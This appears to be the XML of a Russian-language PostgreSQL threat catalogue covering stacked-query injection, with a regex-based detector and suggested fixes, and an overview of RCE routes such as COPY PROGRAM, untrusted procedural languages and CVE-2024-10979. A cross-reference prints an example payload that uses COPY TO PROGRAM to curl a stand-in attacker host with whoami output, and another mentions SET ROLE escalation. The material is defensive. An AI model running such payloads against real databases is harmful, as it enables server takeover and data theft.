      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DDB8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"stacked_node": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638C7ED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:client|pool)\.query\s*\(\s*[`\"'][^`\"']*(?:\$\{|'\s*\+)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA2CF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB97B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E87D964"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5CAB94B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for key in ("stacked_python", "stacked_java", "stacked_go", "stacked_node"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D740917" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if _RE[key].search(sql_or_code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D9970"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7E442E9B"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vulnerability_class=VulnerabilityClass.MULTI_STATEMENT_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BCF71B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246097F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            explanation="Вызов драйвера формирует SQL-строку конкатенацией "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B260FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "или использует API без параметризации — допускает "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F41E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "stacked queries через ; в пользовательском вводе.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCFB752" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            suggested_fix="Передавать значение как отдельный параметр "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8A96B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "(%s/$1/? с setXxx или [values]); для динамических "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948458A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "identifiers — whitelist или специализированный "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A0868A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "хелпер (psycopg.sql.SQL, pgx.Identifier, pg-format).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5639F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9BC46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8AE95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk 9 (не 10) потому, что стакинг сам по себе — этап эскалации; конкретный урон зависит от того, что в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>-команде (DDL, GRANT, COPY PROGRAM — см. 3.7, 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E6C36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A248B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Stacked queries по драйверам (sources/research.md, строки 319–349): libpq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:t>, pgjdbc PreferQueryMode, asyncpg #30, pgx #1090/#1400, node-postgres #757/#1400, psycopg3 from_pg2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B38A290" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Официальные доки драйверов:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> psycopg2 (passing parameters), psycopg3 (server-side parameters binding, from_pg2), asyncpg (Basic Usage), pgjdbc (Connecting + PreferQueryMode), pgx v5 (QueryExecMode), node-postgres (Queries + Parameterized query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C165BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Дополнительно:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JDBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Oracle JDBC tutorial), pg-format (datalanche/node-pg-format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74693EE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049F2121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернативный способ получить side-effect одной командой, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH … AS (INSERT/UPDATE/DELETE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Работает даже в extended-режиме, обходит и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=extended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Граница уже зафиксирована в conventions.md: 3.5 — несколько команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>, 3.10 — одна команда с WITH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C6902E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичная «вторая команда» после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в успешном стакинге. Чаще всего цель эскалации: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ...; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(whoami)'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47962075" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE / SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — «вторая команда» для смены текущей роли в той же сессии после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Через стакинг application-роль может выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и продолжить уже как superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656809FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметризация значений не покрывает динамические identifiers (имена таблиц, колонок). Это отдельная угроза с независимой защитой (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>, whitelist).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353EE73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Влияние managed-провайдеров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF8CD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В отличие от 3.6 (где managed-PG структурно ограничивает векторы), для 3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>managed-провайдер не имеет значения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поведение определяется драйвером и кодом приложения, а не серверной конфигурацией. RDS, Cloud SQL и Supabase одинаково восприимчивы к stacked queries при уязвимом коде; защита целиком на стороне разработчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9FC00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45702E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — исполнение произвольной OS-команды на сервере БД с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS-пользователя `postgres`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или того unix-аккаунта, под которым запущен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postmaster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Все векторы в этой категории требуют, чтобы атакующий уже имел SQL-execution в сессии — то есть RCE здесь это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>финальная стадия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после успешной инъекции (3.1–3.5) или после получения привилегий через другие механизмы (3.13). Сам механизм RCE — серверная фича PostgreSQL (COPY с PROGRAM, untrusted procedural languages), а не баг сервера; единственное исключение — CVE-2024-10979 в trusted plperl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED6901" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Четыре пути к RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E23276" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверная фича COPY, исполняет shell-команду через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen()</w:t>
      </w:r>
      <w:r>
        <w:t>. Самый прямой и быстрый путь, не требует CREATE FUNCTION, не оставляет artifact-функций в базе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6D6AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a plperlu (untrusted Perl)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extension позволяет CREATE FUNCTION с произвольным Perl-кодом, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>. Только superuser может создать функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27565D6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b CVE-2024-10979 в plperl (trusted Perl)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sandbox trusted plperl до фикса позволял изменять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и через PATH-hijacking / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> получать RCE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Единственный путь без superuser</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374AE960" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.3 plpython3u и plsh (untrusted Python и shell)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extension-функции с произвольным Python/bash. Аналогично plperlu — только superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7EC5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сравнительная таблица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4"/>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="3188"/>
        <w:gridCol w:w="1519"/>
        <w:gridCol w:w="1883"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3E72676B"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F6328CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Путь</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A209D08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extension/функция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03518F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия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00BAC80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
